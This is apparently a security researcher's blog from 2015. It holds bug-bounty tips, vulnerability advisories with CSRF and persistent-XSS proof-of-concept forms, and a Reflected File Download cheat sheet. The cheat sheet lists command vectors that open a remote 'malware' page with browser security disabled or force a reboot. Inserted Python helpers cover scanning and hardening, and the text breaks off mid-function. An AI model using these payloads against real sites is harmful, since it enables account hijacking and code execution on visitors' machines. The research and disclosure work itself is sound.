David Sopas

web security researcher

21/10/15 Interesting Readings

Attacking Ruby on Rails

I want to share an interesting read that I noticed when searching Mr. G for Ruby security.
I still haven’t finished reading it for lack of time, but this weekend it will be on my to-do list.

Paper: http://phrack.org/papers/attacking_ruby_on_rails.html

21/10/15 Swag

Hack to the Future with Cobalt

Cobalt.io published a nice image on Twitter with some of the security researchers. Can you guess who’s there?

16/10/15 Tips and Tricks

Get a bounty on a WordPress blog

I would like to describe, step by step, my latest “appreciation program” reward for a security issue in a WordPress plugin.
First things first: check that the blog is in scope of the program. If it is, keep reading. If not, you can just look at my other #bugbounty tips (here and here).

I’m a big fan of WPScan. It’s a great Ruby tool for scanning a WordPress installation. It takes a black-box approach, but it is still a must-use in my opinion.
WPScan didn’t find any real security issue on my target, but it showed me the list of plugins in use:

ruby wpscan.rb --url www.target.com --enumerate p

So I went through them one by one, searching for known vulnerabilities or anything interesting in their changelogs. Nothing…
I needed to start auditing them myself.

I picked the Events Made Easy plugin and installed it on my local box. The plugin is quite simple, and when auditing the source code I noticed that the WordPress nonce security token (or any other form protection) was missing in some places. Some of the variables were also not sanitized, so I could attack it with CSRF and a persistent XSS.

I started creating a proof of concept based on my findings (check the advisory).
I reported the security issue to the “appreciation program” and to the vendor, and requested a CVE reference.

So my steps were:

  1. Check that the WordPress blog is in scope for a reward
  2. Scan it with WPScan [don’t forget to enumerate the plugins]
  3. Analyze the results
  4. If the scan found a vulnerability, report it! If not, download the plugins in use, audit their source code and create a proof of concept
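To make steps 2 to 4 concrete, here is a small Python example (added here; it is neither WPScan’s code nor the author’s) that does the passive half of the job offline: it pulls plugin slugs and versions out of the asset URLs of a WordPress page, the same signal WPScan uses when it enumerates plugins, and then compares them with the stable tag and changelog of the plugin’s public readme.txt to flag the entries worth auditing. The HTML and readme snippets are constructed for the example; events-made-easy 1.5.49 is the version from the advisory below, while example-gallery and its changelog are made up.

```python
import re

# Constructed sample of a WordPress front page (not captured from any real site).
# events-made-easy 1.5.49 is the plugin/version from the advisory; example-gallery is made up.
SAMPLE_HTML = """
<meta name="generator" content="WordPress 4.3.1" />
<link rel='stylesheet' href='https://www.target.com/wp-content/plugins/events-made-easy/css/eme.css?ver=1.5.49' />
<link rel='stylesheet' href='/wp-content/plugins/events-made-easy/css/calendar.css?ver=1.5.49' />
<script src='https://www.target.com/wp-content/plugins/example-gallery/js/gallery.min.js?ver=2.0'></script>
<script src='https://www.target.com/wp-includes/js/jquery/jquery.js?ver=1.11.3'></script>
"""

# Constructed readme.txt for the made-up plugin, in the layout wordpress.org requires.
SAMPLE_README = """=== Example Gallery ===
Stable tag: 2.1
== Changelog ==
= 2.1 =
* Fixed missing nonce check on the settings form
= 2.0 =
* Initial release
"""

# Asset URLs leak the plugin slug and, through ?ver=, usually the plugin version.
PLUGIN_ASSET_RE = re.compile(r"/wp-content/plugins/([\w.-]+)/[^\s'\"?]*(?:\?ver=([\w.-]+))?")
GENERATOR_RE = re.compile(r'<meta name="generator" content="WordPress ([\d.]+)"')
STABLE_TAG_RE = re.compile(r"^Stable tag:\s*([\w.-]+)", re.MULTILINE)
CHANGELOG_RE = re.compile(r"^= ([\w.-]+) =\s*\n((?:\*.*\n?)*)", re.MULTILINE)


def enumerate_plugins(html):
    """Passive plugin enumeration: slug -> version (None when no ?ver= was seen)."""
    plugins = {}
    for slug, ver in PLUGIN_ASSET_RE.findall(html):
        if ver or slug not in plugins:
            plugins[slug] = ver or None
    return plugins


def wordpress_version(html):
    m = GENERATOR_RE.search(html)
    return m.group(1) if m else None


def readme_url(base, slug):
    """Where the public readme.txt (stable tag + changelog) of a plugin lives."""
    return "%s/wp-content/plugins/%s/readme.txt" % (base.rstrip("/"), slug)


def parse_readme(text):
    """Return (stable tag, {version: [changelog lines]})."""
    m = STABLE_TAG_RE.search(text)
    stable = m.group(1) if m else None
    changelog = {}
    for ver, body in CHANGELOG_RE.findall(text):
        changelog[ver] = [line.lstrip("* ").strip() for line in body.splitlines() if line.strip()]
    return stable, changelog


def _vtuple(v):
    # Naive dotted-version comparison; non-numeric components count as 0.
    return tuple(int(x) if x.isdigit() else 0 for x in v.split("."))


def outdated(plugins, stable_tags):
    """Plugins whose enumerated version is older than the stable tag from their readme."""
    return {s: (v, stable_tags[s]) for s, v in plugins.items()
            if v and stable_tags.get(s) and _vtuple(v) < _vtuple(stable_tags[s])}


def security_notes(changelog, since):
    """Changelog entries newer than the installed version that mention a security keyword."""
    keywords = ("nonce", "csrf", "xss", "security", "sanitiz", "escap")
    hits = {}
    for ver, lines in changelog.items():
        if _vtuple(ver) > _vtuple(since):
            flagged = [l for l in lines if any(k in l.lower() for k in keywords)]
            if flagged:
                hits[ver] = flagged
    return hits


if __name__ == "__main__":
    plugins = enumerate_plugins(SAMPLE_HTML)
    print("WordPress", wordpress_version(SAMPLE_HTML), plugins)
    stable, changelog = parse_readme(SAMPLE_README)
    print(outdated(plugins, {"example-gallery": stable}))
    print(security_notes(changelog, plugins["example-gallery"]))
```

In a real engagement the HTML comes from the target’s front page and the readme from /wp-content/plugins/<slug>/readme.txt on the same site (or from wordpress.org); only fetch them if the blog is in scope. A security keyword in a changelog entry newer than the installed version is exactly the “something interesting in the changelog” signal that tells you which plugin to download and audit first.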

Here are some public bounties I found on Nexmo’s blog: https://cobalt.io/nexmo/reports/17 and https://cobalt.io/nexmo/reports/18

Small tip: Sometimes even a full disclosure can get you a small bounty 🙂 https://cobalt.io/nexmo/reports/15

16/10/15 Tips and Tricks

Free online proxy using Bing Translator

This method is already known for many other services, like Google Translate.
I don’t know if I should consider this a security issue. Let’s call it a special Bing Translator feature 🙂

Using the Bing Translator service, anyone can use Microsoft’s IP addresses as a proxy. Malicious users could use this method as a platform to launch web attacks (XSS, SQL injection, etc.) that appear to come from Microsoft; users could also use the service to visit blocked sites.

Example:

http://www.microsofttranslator.com/bv.aspx?from=en&to=en&a=http://www.davidsopas.com/XXE

I noticed in my web server logs that I had two requests made by 157.56.2.63 [msnbot-157-56-2-63.search.msn.com].

Another example, to show the IP address of the requester (ip.php just prints $_SERVER[“REMOTE_ADDR”]):

http://www.microsofttranslator.com/bv.aspx?from=en&to=en&a=http://www.davidsopas.com/poc/ip.php

I noticed that if you use the same language on both sides of the pair (i.e., en-en, English to English), the translation is effectively skipped but the requested web content is still fetched and served through Microsoft’s servers.

Google had the same issue in the past. They fixed the same-language-pair part to prevent misuse of their translation service; in Google Translate you now always need to choose two different languages.

15/10/15 Advisories

Events Made Easy WordPress plugin CSRF + Persistent XSS

Plugin link: https://wordpress.org/plugins/events-made-easy/
Active Installs: 10,000+
Version tested: 1.5.49
CVE Reference: Waiting

Events Made Easy is a full-featured event management solution for WordPress. Events Made Easy supports public, private, draft and recurring events, locations management, RSVP (+ optional approval), Paypal, 2Checkout, FirstData and Google maps. With Events Made Easy you can plan and publish your event, or let people reserve spaces for your weekly meetings. You can add events list, calendars and description to your blog using multiple sidebar widgets or shortcodes; if you are a web designer you can simply employ the template tags provided by Events Made Easy.

While playing around with this plugin I noticed a couple of vulnerabilities. In my opinion they are critical because they could cause damage to a WordPress installation.
All of them are CSRF issues: the vendor forgot to place a security token (wp_nonce) on the affected forms.

#1 Add template CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-templates

If an authenticated admin clicks the “Add template” button on an HTML page with this code:

<form action="https://victims_website/wp-admin/admin.php?page=eme-templates" method="POST">
<input type="hidden" name="eme_admin_action" value="do_addtemplate" />
<input type="hidden" name="description" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="format" value="csrf" />
<input type="submit" name="submit" value="Add template" />
</form>

it will store a persistent XSS vector in the template description field. The payload executes automatically whenever the admin visits admin.php?page=eme-templates.

Possible attack scenario:

  1. The malicious user checks that Events Made Easy is installed on the WordPress site
  2. The malicious user sends the admin a link to a page containing an auto-submit form with an XSS vector that hijacks the victim’s browser
  3. The victim visits the page and is hijacked

#2 Add Form Field CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-formfields

If an authenticated admin clicks the “Add field” button on an HTML page with this code:

<form action="https://victims_website/wp-admin/admin.php?page=eme-formfields" method="POST">
<input type="hidden" name="eme_admin_action" value="do_addformfield" />
<input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="field_type" value="1" />
<input type="hidden" name="field_info" value="csrf" />
<input type="hidden" name="field_tags" value="csrf" />
<input type="submit" name="submit" value="Add field" />
</form>

The attack scenario is the same as for vulnerability #1; the same issue affects the form fields of this plugin.

#3 Remove events older than CSRF

URL: /wp-admin/admin.php?page=eme-cleanup

With this CSRF a malicious user could delete all events older than a chosen period.
In my proof of concept I used an auto-submit form, which could also be used for vulnerabilities #1 and #2.

<form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup" name="dsopas" method="POST">
<input type="hidden" name="page" value="eme-cleanup" />
<input type="hidden" name="eme_admin_action" value="eme_cleanup" />
<input type="hidden" name="eme_number" value="1" />
<input type="hidden" name="eme_period" value="day" />
<input type="hidden" name="doaction" value="Apply" />
</form> <script> document.dsopas.submit(); </script> 

Possible attack scenario:

  1. The malicious user checks that Events Made Easy is installed on the WordPress site
  2. The malicious user sends the admin a link to a page with this auto-submit form
  3. Without the victim noticing, events older than 1 day are removed

Solution:
The vendor released a patched version, 1.5.50, within a matter of hours, and was kind enough to credit me in the changelog.

12/10/15 Bug Bounty, Tips and Tricks

Free online tools to help your #bugbounty

I’m getting a few emails asking for tips on how to get bounties. Because I like to help others and believe in sharing knowledge 🙂 I wrote this small article about using the right online tools to earn some bucks in bounty programs.

Most experienced bug hunters already know most of these tools, but this is mostly for starters.

SSL validation
URL: https://www.ssllabs.com/ssltest/

Qualys provides a free online tool that runs a complete test of a target’s SSL/TLS configuration. Heartbleed, the OpenSSL CCS injection vulnerability, BEAST, POODLE, etc. are all covered by this online test.

Missing SPF? Let’s test it…
URL: http://www.kitterman.com/spf/validate.html

This tool helps you check the SPF records of your target. For many bug bounty participants this is one of the first things to try. It usually gets the minimum payout, if in scope. On HackerOne, Shopify paid $500 for a missing SPF record: https://hackerone.com/reports/54779

Test X-FRAME-Options
URL: http://savanttools.com/test-frame

This tool is useful for checking whether a site uses the X-Frame-Options header to block framing, or frame-breaking / frame-busting JavaScript. If it does neither, you can demonstrate a clickjacking attack with the tool’s help.

Find subdomains of a domain
URL: https://pentest-tools.com/information-gathering/find-subdomains-of-domain

pentest-tools.com gives each user 40 free credits per day, and a subdomain search costs 20 credits, so you can use it twice a day. This is very useful for finding other in-scope targets.

Online fuzzer
URL: https://pentest-tools.com/website-vulnerability-scanning/discover-hidden-directories-and-files

For only 10 credits [of your 40 daily credits] this online URL fuzzer can be used to find hidden files and directories on a web server.
This is a discovery activity that lets you find resources that were not meant to be publicly accessible (e.g. /backups, /index.php.old, /archive.tgz, /source_code.zip).
With a file/directory fuzzer you can always find interesting stuff. I have already found a couple of phpinfo.php files on major companies’ sites and got a few bounties for them.

Using Drupal?
URL: https://hackertarget.com/drupal-security-scan/

With this online tool you get an overview of the Drupal version used, the template name, whether directory indexing is enabled, etc. Some of this information you can use to run further tests and determine whether anything in the Drupal installation is vulnerable.

Using WordPress?
URL: https://hackertarget.com/wordpress-security-scan/

I’m a big fan of WPScan, but if you need a free online tool HackerTarget will do a good job for you.
This tool checks the WordPress version, directory indexing, the list of plugins [and whether updates are available], user enumeration, etc. With this information you can check for vulnerable plugins and write a good report about them.

Using Joomla?
URL: https://hackertarget.com/joomla-security-scan/

Like the previous tools, this one gathers information about Joomla installations. Take a look at the plugins/components; there is usually something worth looking for. Compare versions and Google for changelogs mentioning vulnerabilities. Very often the vulnerability itself is not public, but the changelog says something like “CSRF on options-windows.php”. Just download that version and audit it yourself. That’s what I do 🙂

Target store using Magento?
URL: https://www.magereport.com/

Scan your target’s Magento shop for known security vulnerabilities. This is a very useful tool that can net you a few vulnerabilities in your bounty quest.

I would like to add that there are better tools that you can install on your own system, but that could be another article 🙂

Tip 1: Always read the bounty program details carefully to check what’s in scope. Always respect the rules.
Tip 2: Don’t forget to read my other article, too. Don’t just copy-paste your online results into the report and call it done!

08/10/15 Bug Bounty, Tips and Tricks

A tip for bug hunters – Sell your service

As a bug hunter on Cobalt, HackerOne and Bugcrowd I always try to give programs the information they need to understand a security report.
Sometimes I notice that public disclosures on HackerOne have just two or three paragraphs like:

You guys don’t have SPF header on your mail server.
Check it online here: …

If I were the program manager I would categorize this as a “WTF” bug or something. Not because of the vulnerability itself, but because of the lack of information and effort by the bug hunter. You need to sell your service. You need to show the program that you care and that you know what you are talking about. Treat the program like your client.
Sometimes this makes the difference between earning kudos and earning money.

Elaborate on the security vulnerability as much as possible and describe possible attack scenarios. Screenshots and videos are always a bonus.
Also show the “client” clear solutions to their problem.

This is just a small tip… I hope it makes a difference in your future reports!

06/10/15 Papers

Reflected File Download Cheat Sheet

This article is focused on showing infosec people how to test for and exploit a Reflected File Download (RFD) vulnerability, a class discovered by Oren Hafif of Trustwave. It is not very well known, but when well executed it can be very dangerous.
I’ve been writing security reports on RFD since January 2015 (most still undisclosed) and have found lots of interesting things along the way that I would like to share.
I’m not going to explain in this cheat sheet what RFD is or make a fancy presentation about it. For that you have Oren Hafif’s Black Hat presentation and the Trustwave paper.

 

0x1 Where to look

Most RFD attacks are found in JSON and JSONP APIs [auto-complete, user information, search boxes, order filters, etc.], which most modern web applications use these days.
Start by looking in your proxy [Burp, ZAP, etc.] or the browser inspector for XHR requests. They are usually the prime suspects for RFD.
Don’t discard other requests, such as scripts. I have already found an RFD in a JS file on Google, which got me an entry in their Hall of Fame.
So keep your eyes open and think outside the box.

 

0x2 How to test it

Try to see if a callback parameter is present in the request:

https://www.example-site.pt/api/search?term=f00bar&callback=jQuery_1234

If a callback is present, try changing it to calc.

https://www.example-site.pt/api/search?term=f00bar&callback=calc

If calc is reflected in the response, that’s a good sign. If not, the target may have a whitelist of callbacks. But don’t give up yet: try to find another parameter that is reflected.
In my example you can see the term parameter. Try injecting the following search term:

"||calc||

If the double quote comes back backslash-escaped and the pipe characters are not encoded, you have the attack reflected.

https://www.example-site.pt/api/search?term="||calc||&callback=calc

Important: even if no callback parameter is present in the request, try injecting one. In most cases it’s there 🙂

If you can’t inject a callback, try injecting the vector into another parameter that is reflected. Bear in mind that the URL must be reachable by anyone, not only by you. No self-RFD here 🙂

OK, so you have a reflected callback or a reflected injected parameter. Next we try filename manipulation, which works if the URL mapping is permissive.

Some things you might try:

https://www.example-site.pt/api/search.bat?term=f00bar&callback=calc
https://www.example-site.pt/api/search;setup.bat?term=f00bar&callback=calc
https://www.example-site.pt/api/search/setup.bat?term=f00bar&callback=calc
https://www.example-site.pt/api/search;/setup.bat?term=f00bar&callback=calc
https://www.example-site.pt/api/search;/setup.bat;?term=f00bar&callback=calc

You can use other extensions too; use your imagination. Besides .bat you can use .cmd, .js, .vbs, and even other formats to attack *nix users: http://blog.davidvassallo.me/2014/11/02/practical-reflected-file-download-and-jsonp/

 

0x3 Can’t get download dialog

If the server doesn’t send a Content-Disposition: attachment header to force the download, you must use the HTML5 download attribute to do it. Internet Explorer 8 and 9, which treat JSON as an attachment, will automatically try to download it.

The HTML5 download attribute is available in the following browsers:

  • Chrome
  • Firefox (you need to hack it a little to make it work)
  • Opera

Example 1:

<a href="https://www.example-site.pt/api/setup.bat?callback=chkdsk" download="setup.bat">Download</a>

In Example 1 you can just click the link: Chrome and Opera will download setup.bat. On Firefox you must force “Save link as” by adding the following attribute to the <a> tag:

onclick="return false;"

Example 2:

<a href="https://www.example-site.pt/api/setup.json?callback=chkdsk" download="setup.bat">Download</a>

Just by clicking the Download link, Chrome and Opera will download setup.json, so here you must force the download with “Save link as”, as on Firefox:

<a href="https://www.example-site.pt/api/setup.json?callback=chkdsk" download="setup.bat" onclick="return false">Download</a>

Reminder: keep an eye on the returned HTTP status code. It must be 200; 401 and 403 responses will not lead to RFD attacks.
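As an added example (not from the cheat sheet or any tool it mentions), the following Python code turns 0x2 and 0x3 into a checklist you can run over a captured response: it generates the filename-manipulation URLs from 0x2 for any API endpoint and classifies a response by status code, by whether the "||calc|| vector survived reflection, and by what the Content-Disposition header allows. The sample responses are constructed, one per outcome described above; example-site.pt is the placeholder host used throughout the cheat sheet.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Harmless vector from 0x5: if it reaches the downloaded file unmodified, the batch
# interpreter fails on the junk before the pipes and then runs calc.
VECTOR = '"||calc||'


def filename_variants(url, name="setup.bat"):
    """The path manipulations listed in 0x2, generated for any API URL."""
    parts = urlsplit(url)
    path = parts.path.rstrip("/")
    ext = name.rpartition(".")[2]
    candidates = [
        path + "." + ext,            # /api/search.bat
        path + ";" + name,           # /api/search;setup.bat
        path + "/" + name,           # /api/search/setup.bat
        path + ";/" + name,          # /api/search;/setup.bat
        path + ";/" + name + ";",    # /api/search;/setup.bat;
    ]
    return [urlunsplit((parts.scheme, parts.netloc, c, parts.query, "")) for c in candidates]


def content_disposition(headers):
    """Return (disposition type, filename or None); header names are matched case-insensitively."""
    raw = next((v for k, v in headers.items() if k.lower() == "content-disposition"), None)
    if raw is None:
        return None, None
    dtype, _, params = raw.partition(";")
    m = re.search(r'filename\*?\s*=\s*"?([^";]+)"?', params, re.IGNORECASE)
    return dtype.strip().lower(), (m.group(1).strip() if m else None)


def assess_rfd(status, headers, body, vector=VECTOR):
    """Classify one probe response following 0x2 (reflection) and 0x3 (download dialog)."""
    result = {"status": status, "reflected": False, "exploitable": False, "body_bytes": len(body)}
    if status != 200:
        result["verdict"] = "status %d: only 200 responses lead to RFD" % status
        return result
    # The leading quote may come back backslashed (still a valid batch line); what matters
    # is that the pipes are neither percent-encoded nor turned into \u007c.
    result["reflected"] = vector.lstrip('"') in body
    dtype, fname = content_disposition(headers)
    result["disposition"], result["filename_pinned"] = dtype, fname
    if not result["reflected"]:
        result["verdict"] = "vector not reflected (encoded or whitelisted): try another parameter"
    elif fname:
        result["verdict"] = "filename pinned to %s by Content-Disposition: extension cannot be changed" % fname
    elif dtype == "attachment":
        result["exploitable"] = True
        result["verdict"] = "download forced and filename taken from the URL: works in every browser"
    else:
        result["exploitable"] = True
        result["verdict"] = "reflected but not forced: use <a download> (Chrome/Opera) or Save link as (Firefox)"
    return result


# Constructed responses (not captured from any real site), one per outcome the cheat sheet describes.
REFLECTED_BODY = 'calc({"term":"\\"||calc||","results":[]})'
SAMPLES = {
    "forced": (200, {"Content-Type": "application/json", "Content-Disposition": "attachment"}, REFLECTED_BODY),
    "needs_download_attr": (200, {"Content-Type": "application/json"}, REFLECTED_BODY),
    "pinned": (200, {"Content-Type": "application/json",
                     "Content-Disposition": 'attachment; filename="1.txt"'}, REFLECTED_BODY),
    "encoded": (200, {"Content-Type": "application/json"},
                'calc({"term":"\\u0022\\u007c\\u007ccalc\\u007c\\u007c","results":[]})'),
    "forbidden": (403, {"Content-Type": "text/html"}, "Forbidden"),
}


def assess_samples():
    return {name: assess_rfd(*resp) for name, resp in SAMPLES.items()}


if __name__ == "__main__":
    for u in filename_variants("https://www.example-site.pt/api/search?term=f00bar&callback=calc"):
        print(u)
    for name, r in assess_samples().items():
        print("%-20s exploitable=%-5s %s" % (name, r["exploitable"], r["verdict"]))
```

Feed assess_rfd() the status, headers and body you see in your proxy. The “forced” outcome is the Desk case from 0x4 (attachment with no filename, so the URL path names the file); “needs_download_attr” is where the HTML5 download attribute from 0x3 comes in; “pinned” is the fix from 0x7, which no URL trick gets around. body_bytes is reported because, as 0x6 notes, an oversized .bat will not run.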

 

0x4 Real Scenarios (all of them fixed)

Desk @ http://www.davidsopas.com/desk-com-reflected-filename-download/

The Desk web app allowed a malicious user to craft a direct URL to a malicious download.
Because they sent a Content-Disposition: attachment header, this URL:
https://support.desk_com_client.com/customer/portal/articles/autocomplete.bat?&term=calimdshd&callback=||start%20chrome%davidsopas.com/poc/malware.htm||

worked in every browser, downloading the file without any further manipulation. An example of a perfect RFD attack.

Acunetix @ https://www.davidsopas.com/acunetix-got-rfded/

This one needed a specially crafted web page to download the file, so it’s a nice example of the HTML5 download attribute.

Google @ http://www.websegura.net/advisories/reflected-filename-download-on-google/

This one shows that you don’t need a JSON file to get an RFD attack. Even a JS file that reflects your input will do the job.

 

0x5 RFD vectors

If you just want to give a proof of concept to a vendor, you can use the innocent Windows calculator or open a Chrome window with your site.
If you want to demonstrate other vectors, here is a small list:

  • calc [runs the Windows calculator]
  • chkdsk [runs the Windows check disk utility]
  • start chrome davidsopas.com/poc/malware.htm [opens a new Chrome window with the given URL]
  • start chrome davidsopas.com/poc/malware.htm --disable-web-security --disable-popup-blocking [opens a new Chrome window, with those security options disabled, at the given URL]
  • shutdown -t 0 -r -f [forces an immediate Windows reboot]

Don’t forget that you can use any command you wish, depending on the victim’s operating system.

 

0x6 Bonus tricks

  • Sometimes you may encounter callbacks that are filtered for spaces and special characters. If that is the case, use an RFD vector that fits the filtering (check 0x5 RFD vectors).
  • If the downloaded file is a .bat, remember that there is a limit on its content: if the JSON response you are using is too big, the batch file will not run your RFD attack. Try removing some parameters to reduce the length of the file.
  • JSON/JSONP error messages can sometimes be your best friend. Some of them reflect the parameters you inject and return HTTP 200.
  • If the request accepts text/html and tags are not filtered, you can try injecting a callback containing HTML and turn it into a reflected XSS:

https://www.example-site.pt/api/search.htm?term=f00bar&callback=calc<svg onload=prompt(1)>

  • If you can’t get a reflected vector in the request, but there is a URL showing data you control (a member page, for example) that other people can access, you can use those stored fields to inject the RFD vector.
    Example:

https://www.example-site.pt/1/members/dsopas

{"id":"1234567", "name":"David Sopas"}

Inject your RFD vector:

"||calc||

into your name field and use your member link to attack:

{"id":"1234567", "name":"\";||calc||"}

This shows that sometimes you don’t even need a callback or a parameter in the URL to mount an RFD attack.

  • If your .bat doesn’t run, copy-paste its content into cmd.exe and check what’s going on.
  • Sometimes when you call the XHR URL directly it returns XML. Add ?format=json and you might get lucky!

 

0x7 How to fix it

I think the best solution is to use the Content-Disposition header with a fixed filename:

Content-Disposition: attachment; filename=1.txt

That way it is (so far) impossible to modify the filename and, more importantly, the file extension.
Also, if you use callbacks, whitelist them. Finally, encode (don’t just escape) the values reflected in the response.
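To show what 0x7 means in code, here is an added Python example (not the page’s code, and not tied to any framework) of a JSONP endpoint written twice: the vulnerable shape the cheat sheet exploits, and the hardened one with a whitelisted callback, string values encoded as \uXXXX rather than backslash-escaped, and a fixed Content-Disposition filename. The request data is constructed; X-Content-Type-Options: nosniff is an extra hardening header added here, not something the article recommends.

```python
import json
import re

# A callback is allowed only when it is a plain JavaScript identifier (jQuery-style "a.b" allowed).
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")

# Characters that must never appear as themselves inside a reflected string. Standard JSON
# escaping (\") means nothing to cmd.exe; emitting \uXXXX keeps the JSON valid and inert.
ENCODE_ALWAYS = set('"\\|<>&\'')


def _enc_str(s):
    out = []
    for ch in s:
        cp = ord(ch)
        if cp > 0xFFFF:                       # astral characters as a UTF-16 surrogate pair
            cp -= 0x10000
            out.append("\\u%04x\\u%04x" % (0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF)))
        elif ch in ENCODE_ALWAYS or cp < 0x20 or cp > 0x7E:
            out.append("\\u%04x" % cp)
        else:
            out.append(ch)
    return '"' + "".join(out) + '"'


def encode_json(value):
    """Minimal JSON encoder whose output for strings is safe to reflect verbatim."""
    if value is None:
        return "null"
    if value is True or value is False:
        return "true" if value else "false"
    if isinstance(value, (int, float)):
        return repr(value)
    if isinstance(value, str):
        return _enc_str(value)
    if isinstance(value, (list, tuple)):
        return "[" + ",".join(encode_json(v) for v in value) + "]"
    if isinstance(value, dict):
        return "{" + ",".join(_enc_str(str(k)) + ":" + encode_json(v) for k, v in value.items()) + "}"
    raise TypeError("unsupported type: %r" % type(value))


def roundtrips(value):
    """True when the standard library parses our encoding back to the same value."""
    return json.loads(encode_json(value)) == value


def vulnerable_jsonp(callback, data):
    """The pattern the cheat sheet abuses: callback echoed raw, values only backslash-escaped,
    no filename pinned, so the URL path decides the downloaded file's name and extension."""
    body = json.dumps(data)
    if callback:
        body = "%s(%s)" % (callback, body)
    return 200, {"Content-Type": "application/json"}, body


def safe_jsonp(callback, data):
    """Whitelisted callback, encoded values and a pinned filename, as recommended in 0x7."""
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "Content-Disposition": "attachment; filename=1.txt",   # name and extension fixed server-side
        "X-Content-Type-Options": "nosniff",                    # extra hardening, not from the page
    }
    if callback and not CALLBACK_RE.match(callback):
        return 400, headers, encode_json({"error": "invalid callback"})
    body = encode_json(data)
    if callback:
        headers["Content-Type"] = "application/javascript; charset=utf-8"
        body = "/**/%s(%s);" % (callback, body)
    return 200, headers, body


if __name__ == "__main__":
    payload = {"term": '"||calc||', "results": []}
    print(vulnerable_jsonp("calc", payload)[2])
    print(safe_jsonp("calc", payload))
    print(safe_jsonp("||calc||", payload)[0])
```

Note that the whitelist alone is not enough: calc is a perfectly valid JavaScript identifier, so safe_jsonp() still echoes it, but with the filename pinned to 1.txt the response can no longer be saved as setup.bat through the URL, and with the quotes and pipes encoded the body is no longer a runnable batch line even if it could be.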

 

0x8 Affected sites/companies

Should I be worried about RFD? YES!
Imagine a way of tricking victims into downloading a malicious file from your own domain. It’s important to understand that this is not a social-engineering attack; it only borrows part of one (abusing the human factor) to exploit the trust your clients place in your domain so they download a file [that you never uploaded].
If your client or visitor is not a security expert, just a normal Internet user, he will trust the link, download the file and execute it. People already do this without a trusted domain; imagine how many more will with one.

Oren Hafif said in his BlackHat presentation:

4 out of 5 would trust downloads based on the hosting domain.
RFD uses trust to do evil.

My advice is… patch it before it’s too late.

 

0x9 Thanks

Oren Hafif -> for discovering this type of vulnerability
David Vassallo -> for showing a *nix version of the RFD attack
Ashar Javed -> for giving me the idea of publishing this cheat sheet about RFD and for calling me “RFD Machine” 🙂

 

0xA Other related Reflected File Download links

30/09/15 Advisories

Komento Joomla! component Persistent XSS

CVE Reference: CVE-2015-7324

Komento is a Joomla! comment extension for articles and blogs in K2, EasyBlog, ZOO, Flexicontent, VirtueMart and redShop.

@http://stackideas.com/komento

I found that it was possible to launch a persistent XSS attack when adding a new comment using the WYSIWYG editor’s website and image buttons.
This issue was critical in both environments, frontend and backoffice.

On the frontend, any user visiting a page containing the malicious comment would be affected automatically.
On the other side, the backoffice, the admin reviewing the new comment would be hit by the same payload and could get his account hijacked, or something even more dangerous.

What I did was pass the XSS vector along inside the [img] code and use the JavaScript onload handler to run the exploit when the image loads.

Proof-of-concept using [img]:

[img]http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" onload="prompt(1)[/img]

Proof-of-concept using [url]:

[url="https://www.davidsopas.com" onmouseover="prompt(1)"]Your text to link[/url]

(Image: komento_onmouseover)

In the [img] case this renders the following HTML on the frontend:

<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" data-pagespeed-onload="prompt(1)" alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" onload="prompt(1)" style="max-width:300px;max-height:300px;" onload="var elem=this;if (this==window) elem=document.body;elem.setAttribute('data-pagespeed-loaded', 1)"/>

(Image: komento_frontend)

And in the administrator area:

<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" data-pagespeed-onload="prompt(1)" alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" onload="prompt(1)" style="max-width:300px;max-height:300px;">

This Joomla! component has lots of Google results and can affect a large number of innocent people. A victim is affected just by visiting a page with a malicious comment.

All versions prior to 2.0.5 are affected.
The vendor has already patched both security issues in version 2.0.5: http://stackideas.com/changelog/komento
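As an added example (a reconstruction of the behaviour described above, not Komento’s code), the Python below shows a BBCode-to-HTML converter in the vulnerable shape, where the [img] and [url] arguments are concatenated straight into attributes, next to a hardened version that only accepts http(s) URLs without quotes or whitespace and HTML-escapes everything it emits. The comment payloads reuse the two shapes from the proof of concept; img.example.com is a hypothetical host.

```python
import re
from html import escape
from urllib.parse import urlsplit


def bbcode_to_html_vulnerable(text):
    """Attribute values built by string concatenation from the raw BBCode argument.
    A reconstruction of the behaviour the advisory describes, not the component's code."""
    text = re.sub(r"\[img\](.*?)\[/img\]",
                  lambda m: '<img src="%s" alt="%s" />' % (m.group(1), m.group(1)),
                  text, flags=re.S | re.I)
    text = re.sub(r"\[url=(.*?)\](.*?)\[/url\]",
                  lambda m: '<a href="%s">%s</a>' % (m.group(1).strip('"'), m.group(2)),
                  text, flags=re.S | re.I)
    return text


# Hardened parser: the tag grammar itself refuses quotes, whitespace and brackets inside a URL,
# the URL must be http(s) with a host, and every emitted value goes through html.escape.
TAG_RE = re.compile(
    r'\[img\](?P<img>[^\[\]]+)\[/img\]'
    r'|\[url="?(?P<href>[^\s"\[\]]+)"?\](?P<label>[^\[\]]*)\[/url\]',
    re.I)


def safe_url(url):
    parts = urlsplit(url.strip())
    return (parts.scheme in ("http", "https") and bool(parts.netloc)
            and not any(c in url for c in ' \t\r\n"\'<>'))


def _render(m):
    if m.group("img") is not None:
        url = m.group("img").strip()
        if safe_url(url):
            return '<img src="%s" alt="" />' % escape(url, quote=True)
    elif safe_url(m.group("href")):
        return '<a href="%s" rel="nofollow">%s</a>' % (
            escape(m.group("href"), quote=True), escape(m.group("label"), quote=True))
    return escape(m.group(0), quote=True)      # unsafe tag: show it as literal text


def bbcode_to_html_safe(text):
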